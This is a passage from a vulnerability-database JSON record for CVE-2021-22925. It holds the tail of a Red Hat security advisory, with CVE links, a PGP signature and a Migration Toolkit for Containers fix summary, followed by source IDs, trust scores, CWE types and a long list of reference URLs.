e/CVE-2021-23343\nhttps://access.redhat.com/security/cve/CVE-2021-23840\nhttps://access.redhat.com/security/cve/CVE-2021-23841\nhttps://access.redhat.com/security/cve/CVE-2021-27645\nhttps://access.redhat.com/security/cve/CVE-2021-28153\nhttps://access.redhat.com/security/cve/CVE-2021-29923\nhttps://access.redhat.com/security/cve/CVE-2021-32690\nhttps://access.redhat.com/security/cve/CVE-2021-33560\nhttps://access.redhat.com/security/cve/CVE-2021-33574\nhttps://access.redhat.com/security/cve/CVE-2021-35942\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-39293\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYafeGdzjgjWX9erEAQgZ8Q/9H5ov4ZfKZszdJu0WvRMetEt6DMU2RTZr\nKjv4h4FnmsMDYYDocnkFvsRjcpdGxtoUShAqD6+FrTNXjPtA/v1tsQTJzhg4o50w\ntKa9T4aHfrYXjGvWgQXJJEGmGaYMYePUOv77x6pLfMB+FmgfOtb8kzOdNzAtqX3e\nlq8b2DrQuPSRiWkUgFM2hmS7OtUsqTIShqWu67HJdOY74qDN4DGp7GnG6inCrUjV\nx4/4X5Fb7JrAYiy57C5eZwYW61HmrG7YHk9SZTRYgRW0rfgLncVsny4lX1871Ch2\ne8ttu0EJFM1EJyuCJwJd1Q+rhua6S1VSY+etLUuaYme5DtvozLXQTLUK31qAq/hK\nqnLYQjaSieea9j1dV6YNHjnvV0XGczyZYwzmys/CNVUxwvSHr1AJGmQ3zDeOt7Qz\nvguWmPzyiob3RtHjfUlUpPYeI6HVug801YK6FAoB9F2BW2uHVgbtKOwG5pl5urJt\nG4taizPtH8uJj5hem5nHnSE1sVGTiStb4+oj2LQonRkgLQ2h7tsX8Z8yWM/3TwUT\nPTBX9AIHwt8aCx7XxTeEIs0H9B1T9jYfy06o9H2547un9sBoT0Sm7fqKuJKic8N/\npJ2kXBiVJ9B4G+JjWe8rh1oC1yz5Q5/5HZ19VYBjHhYEhX4s9s2YsF1L1uMoT3NN\nT0pPNmsPGZY=\n=ux5P\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. \n\nSecurity Fix(es):\n\n* nodejs-immer: prototype pollution may lead to DoS or remote code\nexecution (CVE-2021-3757)\n\n* mig-controller: incorrect namespaces handling may lead to not authorized\nusage of Migration Toolkit for Containers (MTC) (CVE-2021-3948)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nFor details on how to install and use MTC, refer to:\n\nhttps://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution\n2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport)\n2006842 - MigCluster CR remains in \"unready\" state and source registry is inaccessible after temporary shutdown of source cluster\n2007429 - \"oc describe\" and \"oc log\" commands on \"Migration resources\" tree cannot be copied after failed migration\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n\n5. Solution:\n\nSee the Red Hat OpenShift Container Platform 4.6 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index\nSee the Red Hat OpenShift Container Platform 4.7 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index\nSee the Red Hat OpenShift Container Platform 4.8 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index\nSee the Red Hat OpenShift Container Platform 4.9 documentation at:\nhttps://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index\n\n4",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-22925"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "VULHUB",
"id": "VHN-381399"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "164249"
},
{
"db": "PACKETSTORM",
"id": "164246"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165862"
}
],
"trust": 2.52
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-22925",
"trust": 3.6
},
{
"db": "HACKERONE",
"id": "1223882",
"trust": 1.9
},
{
"db": "SIEMENS",
"id": "SSA-389290",
"trust": 1.1
},
{
"db": "SIEMENS",
"id": "SSA-484086",
"trust": 1.1
},
{
"db": "JVN",
"id": "JVNVU91709091",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU99030761",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-22-069-09",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "165862",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165099",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "166489",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165129",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "165096",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165135",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165209",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166051",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166308",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165633",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165002",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164886",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165758",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166309",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-381399",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165286",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165287",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164249",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164246",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381399"
},
{
"db": "PACKETSTORM",
"id": "165286"
},
{
"db": "PACKETSTORM",
"id": "165287"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "166489"
},
{
"db": "PACKETSTORM",
"id": "164249"
},
{
"db": "PACKETSTORM",
"id": "164246"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165862"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "NVD",
"id": "CVE-2021-22925"
}
]
},
"id": "VAR-202108-2221",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-381399"
}
],
"trust": 0.7003805
},
"last_update_date": "2026-03-09T20:13:33.055000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Oracle\u00a0Critical\u00a0Patch\u00a0Update\u00a0Advisory\u00a0-\u00a0October\u00a02021 Siemens Siemens\u00a0Security\u00a0Advisory",
"trust": 0.8,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRUCW2UVNYUDZF72DQLFQR4PJEC6CF7V/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-908",
"trust": 1.1
},
{
"problemtype": "CWE-200",
"trust": 1.0
},
{
"problemtype": "Use of uninitialized resources (CWE-908) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381399"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-009763"
},
{
"db": "NVD",
"id": "CVE-2021-22925"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.9,
"url": "https://hackerone.com/reports/1223882"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 1.2,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
},
{
"trust": 1.1,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-484086.pdf"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20210902-0003/"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht212804"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht212805"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2021/sep/39"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2021/sep/40"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/frucw2uvnyudzf72dqlfqr4pjec6cf7v/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu91709091/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99030761/index.html"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-069-09"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20232"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.3,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28153"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20266"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43527"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35524"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35522"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37136"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-44228"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35523"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37137"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-21409"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36330"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35521"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33560"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3445"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3200"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3580"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30830"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30832"
},
{
"trust": 0.2,
"url": "https://support.apple.com/kb/ht201222"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30828"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-0340"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30841"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30855"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30843"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30844"
},
{
"trust": 0.2,
"url": "https://support.apple.com/downloads/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30859"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30829"
},
{
"trust": 0.2,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30857"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30850"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30865"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30827"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30847"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30842"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30860"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-39293"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-29923"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27645"
},
{
"trust": 0.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/frucw2uvnyudzf72dqlfqr4pjec6cf7v/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5128"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20317"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5127"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1081"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24407"
},
{
"trust": 0.1,
"url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3999"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23308"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9."
},
{
"trust": 0.1,
"url": "https://open-policy-agent.github.io/gatekeeper/website/docs/howto/."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43565"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29622"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht212805."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30783"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30713"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30835"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30858"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30853"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30845"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht212804."
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-32690"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4902"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23343"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3801"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33938"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3757"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33930"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33928"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4848"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-37750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3948"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33929"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36222"
},
{
"trust": 0.1,
